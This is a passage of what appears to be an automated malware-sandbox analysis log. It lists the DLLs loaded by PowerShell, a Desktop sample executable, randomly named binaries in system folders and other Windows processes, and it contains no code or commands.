                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: apphelp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dnsapi.dll
